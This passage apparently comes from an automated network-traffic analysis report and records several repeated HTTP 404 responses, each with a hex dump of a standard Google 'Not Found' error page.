                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:16:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:17:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 